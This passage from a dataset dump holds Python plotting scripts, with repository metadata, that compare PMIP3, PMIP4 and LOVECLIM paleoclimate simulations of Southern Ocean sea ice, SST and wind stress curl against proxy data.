LOVEsens.WEAKNA_SUM_SST\nweakNA_AB = LOVEsens.WEAKNA_AB_SUM_SST\nLOVE_zonal = [weakNA,weakNA_AB]\nLOVE_zonal_colors = ['#F7DC6F','#F7DC6F']\nLOVE_linestyle = ['dotted','dashdot']\n\n# set up x axis\nlatitude = np.arange(-89.5,90.5,1)\n\n# setting up the legends\n\n# legend will be least to greatest sea ice for all models\nCNRM_legend = mpatches.Patch(color='black', label='CNRM')\nMIROC_legend = mpatches.Patch(color='#9467bd', label='MIROC-ESM-P/MIROC-ES2L')\nGISS_legend = mpatches.Patch(color='#17becf', label='GISS-E2-R')\nIPSL_legend = mpatches.Patch(color='#2ca02c', label='IPSL-CM5A-LR/IPSL-CM5A2')\nMPI_legend = mpatches.Patch(color='#bcbd22', label='MPI-ESM-P/MPI-ESM1-2')\nMRI_legend = mpatches.Patch(color='#1f77b4', label='MRI-CGCM3')\nFGOALS_legend = mpatches.Patch(color='#e377c2', label='FGOALS-G2')\nAWI_legend = mpatches.Patch(color='#B8255F', label='AWI-ESM-1')\nLOVE_legend = mpatches.Patch(color='#F7DC6F', label='LOVECLIM')\nCESM_legend = mpatches.Patch(color='#8c564b', label='CESM1.2')\nCCSM4_legend = mpatches.Patch(color='#ff7f0e', label='CCSM4/UoTCCSM4')\n#MMM_legend = mpatches.Patch(color='black', label='Multi-model means')\nproxy_legend = mpatches.Patch(color='grey', label='Proxy data')\n\n\nPMIP3_legend = mlines.Line2D([], [], color='black', marker='^', linestyle='None',markersize=8,markerfacecolor='white', label='PMIP3 models')\nPMIP4_legend = mlines.Line2D([], [], color='black', marker='s', linestyle='None',markersize=8,markerfacecolor='white', label='PMIP4 models')\nweakNA_legend = mlines.Line2D([], [], color='black', marker='P', linestyle='None',markersize=8,markerfacecolor='white', label='LOVECLIM-weakNA')\nweakNA_AB_legend = mlines.Line2D([], [], color='black', marker='X', linestyle='None',markersize=8,markerfacecolor='white', label='LOVECLIM-WeakNA_AB')\nProxy_legend = mlines.Line2D([], [], color='black', marker='o', linestyle='None',markersize=8,markerfacecolor='white', label='Proxy estimate')\nProxy_uncertainty = mlines.Line2D([], [], color='black', marker='o', linestyle='None',markersize=8,markerfacecolor='white',alpha=0.3, label='Proxy uncertainty')\n#MMM = mlines.Line2D([], [], color='black', marker='o', linestyle='None',markersize=8, label='Multi-model mean')\ndensly = (0, (3, 1, 1, 1))\nLOVE1_legend = mlines.Line2D([], [], color='#F7DC6F', linestyle ='dotted',label = 'LOVECLIM-weakNA')\nLOVE2_legend = mlines.Line2D([], [], color='#F7DC6F', linestyle ='dashdot',label = 'LOVECLIM-weakNA_AB')\nPMIP3_line = mlines.Line2D([], [], color='black', linestyle ='solid',label = 'PMIP3 model')\nPMIP4_line = mlines.Line2D([], [], color='black', linestyle =densly,label = 'PMIP4 model')\ndegree = mlines.Line2D([], [], color='grey', linestyle ='dashed',label = '-2 ˚C')\n\nuncertainty_sie = plt.Circle((proxySST, proxyseaiceedge), 0.67, color='k', fill=False)\nuncertainty_sia = plt.Circle((proxySST, proxyseaicearea), 0.67, color='k', fill=False)\n\nplt.figure(figsize=(16, 16))\nplt.rcParams['font.sans-serif'] = 'Arial'\nplt.rcParams[\"font.weight\"] = \"bold\"\nmpl.rcParams['axes.linewidth'] = 3 #set the value globally\n\n# plotting sea ice edge\n\nplt.subplot(3, 2, 1)\n#plt.gca().add_patch(uncertainty_sie)\nplt.plot(proxySST,proxyseaiceedge,'ko',fillstyle='none',markersize=69,alpha=0.3)\nfor i in range(len(seaiceedge_PMIP3)):\n plt.plot(SSTtest_PMIP3[i],seaiceedge_PMIP3[i],marker='^',markersize=8,markeredgecolor='k',color=colorsPMIP3[i],zorder=4)\nfor i in range(len(seaiceedge_PMIP4)):\n plt.plot(SSTtest_PMIP4[i],seaiceedge_PMIP4[i],marker='s',markersize=8,markeredgecolor='k',color=colorsPMIP4[i])\n# no for loop for love because two different symbols\nplt.plot(SSTtest_LOVE[0],seaiceedge_LOVE[0],marker='X',markersize=8,color=colorsLOVE[0],markeredgecolor='k')\nplt.plot(SSTtest_LOVE[1],seaiceedge_LOVE[1],marker='P',markersize=8,color=colorsLOVE[0],markeredgecolor='k')\nplt.plot(proxySST,proxyseaiceedge,marker='o',markersize=8,color='white',markeredgecolor='k',zorder=4)\n# not sure what to do about this symbol\n#plt.plot(SSTtest_LOVE[2],seaiceedge_LOVE[2],marker='X',markersize=8,color='black')\n# no proxy sea ice edge yet\n#linear fit\nplt.plot(SSTtest_total,fit_sie,'grey')\n\n# labeling\nplt.grid()\nplt.xlabel('SST (˚ C)',fontweight='bold',fontsize=15)\nplt.ylabel('Sea ice edge (˚ S)',fontweight='bold',fontsize=15)\nplt.tick_params(bottom=True, top=True, left=True, right=True)\nplt.tick_params(axis='both', direction=\"in\", length=7, width=3, color=\"black\")\n\n\n\n# plotting sea ice area\n\nplt.subplot(3,2,2)\nplt.tick_params(bottom=False, top=True, left=False, right=False)\n#plt.gca().add_patch(uncertainty_sia)\nplt.plot(proxySST,proxyseaicearea,'ko',fillstyle='none',markersize=68,alpha=0.3)\nfor i in range(len(seaiceedge_PMIP3)):\n plt.plot(SSTtest_PMIP3[i],seaicearea_PMIP3[i],marker='^',markersize=8,color=colorsPMIP3[i],markeredgecolor='k',zorder=4)\nfor i in range(len(seaiceedge_PMIP4)):\n plt.plot(SSTtest_PMIP4[i],seaicearea_PMIP4[i],marker='s',markersize=8,color=colorsPMIP4[i],markeredgecolor='k')\n# no for loop for love because two different symbols\nplt.plot(SSTtest_LOVE[0],seaicearea_LOVE[0],marker='P',markersize=8,color=colorsLOVE[0],markeredgecolor='k')\nplt.plot(SSTtest_LOVE[1],seaicearea_LOVE[1],marker='X',markersize=8,color=colorsLOVE[0],markeredgecolor='k')\n# not sure what to do about this symbol\n#plt.plot(SSTtest_LOVE[2],seaicearea_LOVE[2],marker='X',markersize=8,color='black')\n# proxy\nplt.plot(proxySST,proxyseaicearea,marker='o',markersize=8,color='white',markeredgecolor='k')\n#linear fit\nplt.plot(SSTtest_total,fit_sia,'grey',zorder=0)\n# labeling\nplt.grid()\nplt.xlabel('SST (˚ C)',fontweight='bold',fontsize=15)\nplt.ylabel('Sea ice extent (10$^6$ km$_2$) ',fontweight='bold',fontsize=15)\nplt.tick_params(bottom=True, top=True, left=True, right=True)\nplt.tick_params(axis='both', direction=\"in\", length=7, width=3, color=\"black\")\nplt.legend(handles=[PMIP3_legend,PMIP4_legend,weakNA_legend,weakNA_AB_legend,Proxy_legend,Proxy_uncertainty],ncol=2)\n\n\n# plotting zonal averages\n\nplt.subplot(3,2,(3,4))\n# two different ways of doing the same thing\nfor i in range(len(PMIP3_zonal)):\n plt.plot(latitude,PMIP3_zonal[i],color=PMIP3_zonal_colors[i])\nfor y,c,l in zip(LOVE_zonal, LOVE_zonal_colors,LOVE_linestyle):\n plt.plot(latitude,y,color=c,linestyle=l)\n\nproxy = pd.read_excel('~/Desktop/UNSW/Table_Recap_LGM_Final.xlsx',engine=\"openpyxl\",sheet_name='Data')\ndata = proxy[['Latitude', 'LGM']]\ndata = data[3:]\ndata = data.dropna()\ndata = data.reset_index(drop=True)\n\nplt.scatter(data.Latitude,data.LGM,color='darkgray')\nave = data\nave.Latitude = ave.Latitude.round()\nave = ave.astype(float)\nproxyavg = ave.groupby('Latitude').mean().reset_index()\nplt.plot(proxyavg.Latitude,proxyavg.LGM,color='darkgray')\nplt.hlines(y=-2,xmin=-60,xmax=-35,linestyles='dashed',color='grey')\nplt.xlim(-75,-35)\nplt.ylim(-5,25)\nplt.ylabel('SST (˚ C) ',fontweight='bold',fontsize=15)\n#plt.xlabel('Latitude (˚ S)',fontweight='bold',fontsize=15)\nplt.tick_params(bottom=True, top=True, left=True, right=True)\nplt.tick_params(axis='both', direction=\"in\", length=7, width=3, color=\"black\")\nplt.grid()\nplt.legend(handles=[CNRM_legend,MIROC_legend,GISS_legend,IPSL_legend,MPI_legend,MRI_legend,FGOALS_legend,AWI_legend,LOVE_legend,CESM_legend,CCSM4_legend,proxy_legend,LOVE1_legend,LOVE2_legend,degree],ncol=2)\nplt.title('PMIP3 models and LOVECLIM sensitivity runs',fontweight='bold',fontsize=15)\n\n# PMIP4\n\nplt.subplot(3,2,(5,6))\nfor y,c in zip(PMIP4_zonal, PMIP4_zonal_colors):\n plt.plot(latitude,y,color=c)\n\nproxy = pd.read_excel('~/Desktop/UNSW/Table_Recap_LGM_Final.xlsx',engine=\"openpyxl\",sheet_name='Data')\ndata = proxy[['Latitude', 'LGM']]\ndata = data[3:]\ndata = data.dropna()\ndata = data.reset_index(drop=True)\nplt.scatter(data.Latitude,data.LGM,color='darkgray')\n\n\n# for some reason was changing the OG data frame so doing changes here\n# cleaning up proxy data for zonally averaged line\n# cleaning up proxy data for zonally averaged line\nave = data\nave.Latitude = ave.Latitude.round()\nave = ave.astype(float)\nproxyavg = ave.groupby('Latitude').mean().reset_index()\nplt.plot(proxyavg.Latitude,proxyavg.LGM,color='darkgray')\nplt.hlines(y=-2,xmin=-60,xmax=-35,linestyles='dashed',color='grey')\nplt.xlim(-75,-35)\nplt.ylim(-5,25)\nplt.ylabel('SST (˚ C) ',fontweight='bold',fontsize=15)\nplt.xlabel('Latitude (˚ S)',fontweight='bold',fontsize=15)\nplt.tick_params(bottom=True, top=True, left=True, right=True)\nplt.tick_params(axis='both', direction=\"in\", length=7, width=3, color=\"black\")\nplt.grid()\nplt.title('PMIP4 models',fontweight='bold',fontsize=15)\nplt.show()\nplt.tight_layout()\n#plt.savefig('Figures/Figure2.pdf')\n"
},
{
"alpha_fraction": 0.6014330983161926,
"alphanum_fraction": 0.681369423866272,
"avg_line_length": 47.30769348144531,
"blob_id": "5c38b25fd7214116a6c9e71841ecc3f632efeccc",
"content_id": "a5bf5dbbe1d46619c67a90b391851f7ddf1f910c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6281,
"license_type": "no_license",
"max_line_length": 167,
"num_lines": 130,
"path": "/Figure5.py",
"repo_name": "RyanAGreen/PMIP_seaice",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport xarray as xr\nimport matplotlib.pyplot as plt\nimport matplotlib.path as mpath\nimport matplotlib.lines as mlines\nimport matplotlib.patches as mpatches\nimport matplotlib as mpl\n\ncurl = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/windstresscurlPMIP4.nc')\nPMIP3_bad = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/windstresscurlbadLOVE1.nc')\nPMIP3_good = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/windstresscurlgoodLOVE1.nc')\n\ncurl['CESM'] = curl.CESM*0.1\n\nLOVE = [PMIP3_good.CURLNAW,PMIP3_good.CURLNAWSOW]\nPMIP3 = [PMIP3_bad.CURLCNRM,PMIP3_bad.CURLGISS,PMIP3_bad.CURLIPSL,PMIP3_good.CURLMIROC,PMIP3_good.CURLMPI,PMIP3_good.CURLMRI,PMIP3_good.CURLFGOALS,PMIP3_bad.CURLCCSM4]\nPMIP4 = [curl.MIROC,curl.IPSL,curl.MPI,curl.AWI,curl.LOVE,curl.CESM,curl.CCSM4]\n# these are exact but I rounded\n# PMIP3_sie = [-75.5,-65.5,-70,-66.5,-65,-62.5,-61.5,-55.5]\n# PMIP4_sie = [-75.5,-70,-65,-62,-59.5,-57.5,-53]\n# LOVE_sie = [-59.5,58.5]\n\n# rounded down\nPMIP3_sie = [-75.5,-65.5,-69.5,-66.5,-64.5,-62.5,-61.5,-55.5]\nPMIP4_sie = [-75.5,-69.5,-64.5,-61.5,-59.5,-57.5,-52.5]\nLOVE_sie = [-59.5,-58.5]\n\n# rounded up\n# PMIP3_sie = [-75.5,-65.5,-70.5,-66.5,-65.5,-62.5,-61.5,-55.5]\n# PMIP4_sie = [-75.5,-71.5,-65.5,-62.5,-59.5,-57.5,-53.5]\n# LOVE_sie = [-59.5,-58.5]\n\nPMIP3_colors = ['#ff7f0e','#e377c2','#1f77b4','#bcbd22','#9467bd','#2ca02c','#17becf','black']\nPMIP3_colors.reverse()\nPMIP4_colors = ['#ff7f0e','#8c564b','#F7DC6F','#B8255F','#bcbd22','#2ca02c','#9467bd']\nPMIP4_colors.reverse()\nLOVE_colors = ['#F7DC6F','#F7DC6F']\nLOVE_linestyle = ['dotted','dashdot']\n\n# set up legends\n\nPMIP3names = ['CNRM','GISS-E2-R','IPSL-CM5A-LR','MIROC-ESM-P','MPI-ESM-P','MRI-CGCM3','FGOALS-G2','CCSM4']\nPMIP4names= ['MIROC-ES2L','IPSL-CM5A2','MPI-ESM1-2','AWI-ESM-1','LOVECLIM','CESM1.2','UoT-CCSM4']\nLOVEnames = ['weakNA','weakNA_AB']\n# colors are set from most sea ice to least\nPMIP3_colors = ['#ff7f0e','#e377c2','#1f77b4','#bcbd22','#9467bd','#2ca02c','#17becf','black']\nPMIP3_colors.reverse()\nPMIP4_colors = ['#ff7f0e','#8c564b','#F7DC6F','#B8255F','#bcbd22','#2ca02c','#9467bd']\nPMIP4_colors.reverse()\nLOVE_colors = ['#F7DC6F','#F7DC6F']\n\n#PMIP3\nCNRM_leg = mlines.Line2D([], [], color=PMIP3_colors[0], linestyle ='solid',label = PMIP3names[0])\nGISS3_leg = mlines.Line2D([], [], color=PMIP3_colors[1], linestyle ='solid',label = PMIP3names[1])\nIPSL3_leg = mlines.Line2D([], [], color=PMIP3_colors[2], linestyle ='solid',label = PMIP3names[2])\nMIROC3_leg = mlines.Line2D([], [], color=PMIP3_colors[3], linestyle ='solid',label = PMIP3names[3])\nMPI3_leg = mlines.Line2D([], [], color=PMIP3_colors[4], linestyle ='solid',label = PMIP3names[4])\nMRI_leg = mlines.Line2D([], [], color=PMIP3_colors[5], linestyle ='solid',label = PMIP3names[5])\nFGOALS_leg = mlines.Line2D([], [], color=PMIP3_colors[6], linestyle ='solid',label = PMIP3names[6])\nCCSM4_leg = mlines.Line2D([], [], color=PMIP3_colors[7], linestyle ='solid',label = PMIP3names[7])\n\n#PMIP4\nMIROC4_leg = mlines.Line2D([], [], color=PMIP4_colors[0], linestyle ='solid',label = PMIP4names[0])\nIPSL4_leg = mlines.Line2D([], [], color=PMIP4_colors[1], linestyle ='solid',label = PMIP4names[1])\nMPI4_leg = mlines.Line2D([], [], color=PMIP4_colors[2], linestyle ='solid',label = PMIP4names[2])\nAWI_leg = mlines.Line2D([], [], color=PMIP4_colors[3], linestyle ='solid',label = PMIP4names[3])\nLOVE_leg = mlines.Line2D([], [], color=PMIP4_colors[4], linestyle ='solid',label = PMIP4names[4])\nCESM_leg = mlines.Line2D([], [], color=PMIP4_colors[5], linestyle ='solid',label = PMIP4names[5])\nCCSM4UoT_leg = mlines.Line2D([], [], color=PMIP4_colors[6], linestyle ='solid',label = PMIP4names[6])\n\n#LOVE\nweakNA_leg = mlines.Line2D([], [], color=LOVE_colors[0], linestyle ='dotted',label = LOVEnames[0])\nweakNA_AB_leg = mlines.Line2D([], [], color=LOVE_colors[1], linestyle ='dashdot',label = LOVEnames[1])\n\nfig,ax = plt.subplots(3,figsize=(8,12),sharex=True)\nplt.rcParams['font.sans-serif'] = 'Arial'\nplt.rcParams[\"font.weight\"] = \"bold\"\nymin = -2.5\nymax = 2.5\nfor i in range(3):\n ax[i].set_xlim(-80,-30)\n ax[i].set_ylim(ymin,ymax)\n ax[i].vlines(-75.5,ymin=ymin,ymax=ymax,colors='k',linestyles='dashdot',label='Antarctic Coast')\n ax[i].grid(ls=':')\n ax[i].tick_params(axis=\"both\", direction=\"out\", length=5, width=3, color=\"black\")\n for axis in ['top','bottom','left','right']:\n ax[i].spines[axis].set_linewidth(3)\n\nfor i in range(len(PMIP3)):\n ax[0].plot(PMIP3_bad.LAT,PMIP3[i],color=PMIP3_colors[i])\n ax[0].plot(PMIP3_sie[i],PMIP3[i].where(curl.LAT==PMIP3_sie[i],drop=True),marker='o',color=PMIP3_colors[i],markeredgecolor='k')\n\nax[0].legend(handles=[CNRM_leg,GISS3_leg,IPSL3_leg,MIROC3_leg,MPI3_leg,MRI_leg,FGOALS_leg,CCSM4_leg])\n\nfor i in range(len(PMIP4)):\n ax[1].plot(PMIP3_bad.LAT,PMIP4[i],color=PMIP4_colors[i])\n ax[1].plot(PMIP4_sie[i],PMIP4[i].where(curl.LAT==PMIP4_sie[i],drop=True),marker='o',color=PMIP4_colors[i],markeredgecolor='k')\n\nax[1].legend(handles=[MIROC4_leg,IPSL4_leg,MPI4_leg,AWI_leg,LOVE_leg,CESM_leg,CCSM4UoT_leg])\n\nfor i in range(len(LOVE)):\n ax[2].plot(PMIP3_bad.LAT,LOVE[i],color=LOVE_colors[i],ls = LOVE_linestyle[i])\n ax[2].plot(LOVE_sie[i],LOVE[i].where(curl.LAT==LOVE_sie[i],drop=True),marker='o',color=LOVE_colors[i],markeredgecolor='k')\n\nax[2].legend(handles=[weakNA_leg,weakNA_AB_leg])\n\n# for i in range(3):\n# ax[i].text(-76.5,0.5,'Antarctic coast',rotation='vertical',fontsize=10,fontweight='bold')\n\nax[1].text(-76.5,0.5,'Antarctic coast',rotation='vertical',fontsize=10,fontweight='bold')\n\nax[0].text(-79,2.2,'a)',fontsize=10,fontweight='bold')\nax[1].text(-79,2.2,'b)',fontsize=10,fontweight='bold')\nax[2].text(-79,2.2,'c)',fontsize=10,fontweight='bold')\nax[0].set_title('PMIP3 models',fontsize=15,fontweight='bold')\nax[1].set_title('PMIP4 models',fontsize=15,fontweight='bold')\nax[2].set_title('LOVECLIM sensitivity runs',fontsize=15,fontweight='bold')\n\nplt.tight_layout(pad=2.2)\n\n# add labels\nfig.add_subplot(111, frameon=False)\n# hide tick and tick label of the big axes\nplt.tick_params(labelcolor='none', top=False, bottom=False, left=False, right=False)\nplt.grid(False)\nplt.ylabel(\"Wind Stress Curl (m/s)\",fontsize=15,fontweight='bold')\nplt.xlabel(\"Latitude (˚ S)\",fontsize=15,fontweight='bold')\n\nplt.show()\n#plt.savefig('Figures/Figure5_9.27.21.pdf')\n"
},
{
"alpha_fraction": 0.6377714276313782,
"alphanum_fraction": 0.7053222060203552,
"avg_line_length": 56.0355339050293,
"blob_id": "3da2c154ef46fdd46c691a974d1c2049789b0bbf",
"content_id": "c425582b245411820413a3bbf6316b0645de2e21",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 11237,
"license_type": "no_license",
"max_line_length": 202,
"num_lines": 197,
"path": "/Figure5_seperated.py",
"repo_name": "RyanAGreen/PMIP_seaice",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport xarray as xr\nimport matplotlib.pyplot as plt\nimport matplotlib.path as mpath\nimport matplotlib.lines as mlines\nimport matplotlib.patches as mpatches\nimport matplotlib as mpl\n\ncurl = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/windstresscurlPMIP4.nc')\nPMIP3_bad = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/windstresscurlbadLOVE1.nc')\nPMIP3_good = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/windstresscurlgoodLOVE1.nc')\n\ncurl['CESM'] = curl.CESM*0.1\n\nLOVE = [PMIP3_good.CURLNAW,PMIP3_good.CURLNAWSOW]\nPMIP3 = [PMIP3_bad.CURLCNRM,PMIP3_bad.CURLGISS,PMIP3_bad.CURLIPSL,PMIP3_good.CURLMIROC,PMIP3_good.CURLMPI,PMIP3_good.CURLMRI,PMIP3_good.CURLFGOALS,PMIP3_bad.CURLCCSM4]\nPMIP4 = [curl.MIROC,curl.IPSL,curl.MPI,curl.AWI,curl.LOVE,curl.CESM,curl.CCSM4]\n\nThermodynamically_PMIP4 = [PMIP4[0],PMIP4[1],PMIP4[5],PMIP4[6]]\nDynamically_PMIP4 = [PMIP4[2],PMIP4[3],PMIP4[4]]\n\nThermodynamically_PMIP3 = [PMIP3[0],PMIP3[1],PMIP3[2],PMIP3[3],PMIP3[7]]\nDynamically_PMIP3 = [PMIP3[4],PMIP3[5],PMIP3[6]]\n\n# these are exact but I rounded\n# PMIP3_sie = [-75.5,-65.5,-70,-66.5,-65,-62.5,-61.5,-55.5]\n# PMIP4_sie = [-75.5,-70,-65,-62,-59.5,-57.5,-53]\n# LOVE_sie = [-59.5,58.5]\n\n# rounded down\nPMIP3_sie = [-75.5,-65.5,-69.5,-66.5,-64.5,-62.5,-61.5,-55.5]\nPMIP4_sie = [-75.5,-69.5,-64.5,-61.5,-59.5,-57.5,-52.5]\nLOVE_sie = [-59.5,-58.5]\nThermodynamically_PMIP4_sie = [PMIP4_sie[0],PMIP4_sie[1],PMIP4_sie[5],PMIP4_sie[6]]\nDynamically_PMIP4_sie = [PMIP4_sie[2],PMIP4_sie[3],PMIP4_sie[4]]\n\nThermodynamically_PMIP3_sie = [PMIP3_sie[0],PMIP3_sie[1],PMIP3_sie[2],PMIP3_sie[3],PMIP3_sie[7]]\nDynamically_PMIP3_sie = [PMIP3_sie[4],PMIP3_sie[5],PMIP3_sie[6]]\n\n\n# rounded up\n# PMIP3_sie = [-75.5,-65.5,-70.5,-66.5,-65.5,-62.5,-61.5,-55.5]\n# PMIP4_sie = [-75.5,-71.5,-65.5,-62.5,-59.5,-57.5,-53.5]\n# LOVE_sie = [-59.5,-58.5]\n\nPMIP3_colors = ['#ff7f0e','#e377c2','#1f77b4','#bcbd22','#9467bd','#2ca02c','#17becf','black']\nPMIP3_colors.reverse()\n\nPMIP4_colors = ['#ff7f0e','#8c564b','#F7DC6F','#B8255F','#bcbd22','#2ca02c','#9467bd']\nPMIP4_colors.reverse()\nLOVE_colors = ['#F7DC6F','#F7DC6F']\nLOVE_linestyle = ['dotted','dashdot']\n\n\n\n# set up legends\n\nPMIP3names = ['CNRM','GISS-E2-R','IPSL-CM5A-LR','MIROC-ESM-P','MPI-ESM-P','MRI-CGCM3','FGOALS-G2','CCSM4']\nPMIP4names= ['MIROC-ES2L','IPSL-CM5A2','MPI-ESM1-2','AWI-ESM-1','LOVECLIM','CESM1.2','UoT-CCSM4']\nLOVEnames = ['weakNA','weakNA_AB']\nThermodynamically_PMIP4_names = [PMIP4names[0],PMIP4names[1],PMIP4names[5],PMIP4names[6]]\nDynamically_PMIP4_names = [PMIP4names[2],PMIP4names[3],PMIP4names[4]]\n\nThermodynamically_PMIP3_names= [PMIP3names[0],PMIP3names[1],PMIP3names[2],PMIP3names[3],PMIP3names[7]]\nDynamically_PMIP3_names = [PMIP3names[4],PMIP3names[5],PMIP3names[6]]\n\n\n# colors are set from most sea ice to least\nPMIP3_colors = ['#ff7f0e','#e377c2','#1f77b4','#bcbd22','#9467bd','#2ca02c','#17becf','black']\nPMIP3_colors.reverse()\nPMIP4_colors = ['#ff7f0e','#8c564b','#F7DC6F','#B8255F','#bcbd22','#2ca02c','#9467bd']\nPMIP4_colors.reverse()\nLOVE_colors = ['#F7DC6F','#F7DC6F']\n\nThermodynamically_PMIP4_colors = [PMIP4_colors[0],PMIP4_colors[1],PMIP4_colors[5],PMIP4_colors[6]]\nDynamically_PMIP4_colors = [PMIP4_colors[2],PMIP4_colors[3],PMIP4_colors[4]]\n\nThermodynamically_PMIP3_colors= [PMIP3_colors[0],PMIP3_colors[1],PMIP3_colors[2],PMIP3_colors[3],PMIP3_colors[7]]\nDynamically_PMIP3_colors = [PMIP3_colors[4],PMIP3_colors[5],PMIP3_colors[6]]\n\n\n#PMIP3\nCNRM_leg = mlines.Line2D([], [], color=PMIP3_colors[0], linestyle ='solid',label = PMIP3names[0])\nGISS3_leg = mlines.Line2D([], [], color=PMIP3_colors[1], linestyle ='solid',label = PMIP3names[1])\nIPSL3_leg = mlines.Line2D([], [], color=PMIP3_colors[2], linestyle ='solid',label = PMIP3names[2])\nMIROC3_leg = mlines.Line2D([], [], color=PMIP3_colors[3], linestyle ='solid',label = PMIP3names[3])\nMPI3_leg = mlines.Line2D([], [], color=PMIP3_colors[4], linestyle ='solid',label = PMIP3names[4])\nMRI_leg = mlines.Line2D([], [], color=PMIP3_colors[5], linestyle ='solid',label = PMIP3names[5])\nFGOALS_leg = mlines.Line2D([], [], color=PMIP3_colors[6], linestyle ='solid',label = PMIP3names[6])\nCCSM4_leg = mlines.Line2D([], [], color=PMIP3_colors[7], linestyle ='solid',label = PMIP3names[7])\n\n#PMIP4\nMIROC4_leg = mlines.Line2D([], [], color=PMIP4_colors[0], linestyle ='solid',label = PMIP4names[0])\nIPSL4_leg = mlines.Line2D([], [], color=PMIP4_colors[1], linestyle ='solid',label = PMIP4names[1])\nMPI4_leg = mlines.Line2D([], [], color=PMIP4_colors[2], linestyle ='solid',label = PMIP4names[2])\nAWI_leg = mlines.Line2D([], [], color=PMIP4_colors[3], linestyle ='solid',label = PMIP4names[3])\nLOVE_leg = mlines.Line2D([], [], color=PMIP4_colors[4], linestyle ='solid',label = PMIP4names[4])\nCESM_leg = mlines.Line2D([], [], color=PMIP4_colors[5], linestyle ='solid',label = PMIP4names[5])\nCCSM4UoT_leg = mlines.Line2D([], [], color=PMIP4_colors[6], linestyle ='solid',label = PMIP4names[6])\n\n#LOVE\nweakNA_leg = mlines.Line2D([], [], color=LOVE_colors[0], linestyle ='dotted',label = LOVEnames[0])\nweakNA_AB_leg = mlines.Line2D([], [], color=LOVE_colors[1], linestyle ='dashdot',label = LOVEnames[1])\n\n# straight from Figure 2\n# legend will be least to greatest sea ice for all models\nCNRM_legend = mpatches.Patch(color='black', label='CNRM')\nMIROC_legend = mpatches.Patch(color='#9467bd', label='MIROC-ESM-P/MIROC-ES2L')\nGISS_legend = mpatches.Patch(color='#17becf', label='GISS-E2-R')\nIPSL_legend = mpatches.Patch(color='#2ca02c', label='IPSL-CM5A-LR/IPSL-CM5A2')\nMPI_legend = mpatches.Patch(color='#bcbd22', label='MPI-ESM-P/MPI-ESM1-2')\nMRI_legend = mpatches.Patch(color='#1f77b4', label='MRI-CGCM3')\nFGOALS_legend = mpatches.Patch(color='#e377c2', label='FGOALS-G2')\nAWI_legend = mpatches.Patch(color='#B8255F', label='AWI-ESM-1')\nLOVE_legend = mpatches.Patch(color='#F7DC6F', label='LOVECLIM')\nCESM_legend = mpatches.Patch(color='#8c564b', label='CESM1.2')\nCCSM4_legend = mpatches.Patch(color='#ff7f0e', label='CCSM4/UoTCCSM4')\n#MMM_legend = mpatches.Patch(color='black', label='Multi-model means')\nproxy_legend = mpatches.Patch(color='grey', label='Proxy data')\nPMIP4legend = mlines.Line2D([], [], color='black', linestyle ='solid',label = 'PMIP4 models')\nPMIP3legend = mlines.Line2D([], [], color='black', linestyle ='dashed',label = 'PMIP3 models')\n\nPMIP3_legend = mlines.Line2D([], [], color='black', marker='^', linestyle='None',markersize=8,markerfacecolor='white', label='PMIP3 models')\nPMIP4_legend = mlines.Line2D([], [], color='black', marker='s', linestyle='None',markersize=8,markerfacecolor='white', label='PMIP4 models')\nweakNA_legend = mlines.Line2D([], [], color='black', marker='P', linestyle='None',markersize=8,markerfacecolor='white', label='LOVECLIM-weakNA')\nweakNA_AB_legend = mlines.Line2D([], [], color='black', marker='X', linestyle='None',markersize=8,markerfacecolor='white', label='LOVECLIM-WeakNA_AB')\nProxy_legend = mlines.Line2D([], [], color='black', marker='o', linestyle='None',markersize=8,markerfacecolor='white', label='Estimate from \\nproxy SST')\n#MMM = mlines.Line2D([], [], color='black', marker='o', linestyle='None',markersize=8, label='Multi-model mean')\ndensly = (0, (3, 1, 1, 1))\nLOVE1_legend = mlines.Line2D([], [], color='#F7DC6F', linestyle ='dotted',label = 'LOVECLIM-weakNA')\nLOVE2_legend = mlines.Line2D([], [], color='#F7DC6F', linestyle ='dashdot',label = 'LOVECLIM-weakNA_AB')\nPMIP3_line = mlines.Line2D([], [], color='black', linestyle ='solid',label = 'PMIP3 model')\nPMIP4_line = mlines.Line2D([], [], color='black', linestyle =densly,label = 'PMIP4 model')\n\nfig,ax = plt.subplots(2,figsize=(10,10),sharex=True)\nplt.rcParams['font.sans-serif'] = 'Arial'\nplt.rcParams[\"font.weight\"] = \"bold\"\nymin = -2.5\nymax = 2.5\nfor i in range(2):\n ax[i].set_xlim(-80,-30)\n ax[i].set_ylim(ymin,ymax)\n ax[i].vlines(-75.5,ymin=ymin,ymax=ymax,colors='k',linestyles='dashdot',label='Antarctic Coast')\n ax[i].grid(ls=':')\n ax[i].tick_params(axis=\"both\", direction=\"out\", length=5, width=3, color=\"black\")\n for axis in ['top','bottom','left','right']:\n ax[i].spines[axis].set_linewidth(3)\n\nfor i in range(len(Thermodynamically_PMIP3)):\n ax[0].plot(PMIP3_bad.LAT,Thermodynamically_PMIP3[i],color=Thermodynamically_PMIP3_colors[i],ls = '--')\n ax[0].plot(Thermodynamically_PMIP3_sie[i],Thermodynamically_PMIP3[i].where(curl.LAT==Thermodynamically_PMIP3_sie[i],drop=True),marker='o',color=Thermodynamically_PMIP3_colors[i],markeredgecolor='k')\nfor i in range(len(Thermodynamically_PMIP4)):\n ax[0].plot(PMIP3_bad.LAT,Thermodynamically_PMIP4[i],color=Thermodynamically_PMIP4_colors[i])\n ax[0].plot(Thermodynamically_PMIP4_sie[i],Thermodynamically_PMIP4[i].where(curl.LAT==Thermodynamically_PMIP4_sie[i],drop=True),marker='o',color=Thermodynamically_PMIP4_colors[i],markeredgecolor='k')\n\n#ax[0].legend(handles=[CNRM_leg,GISS3_leg,IPSL3_leg,MIROC3_leg,MPI3_leg,MRI_leg,FGOALS_leg,CCSM4_leg])\n\nfor i in range(len(Dynamically_PMIP3)):\n ax[1].plot(PMIP3_bad.LAT,Dynamically_PMIP3[i],color=Dynamically_PMIP3_colors[i],ls = '--')\n 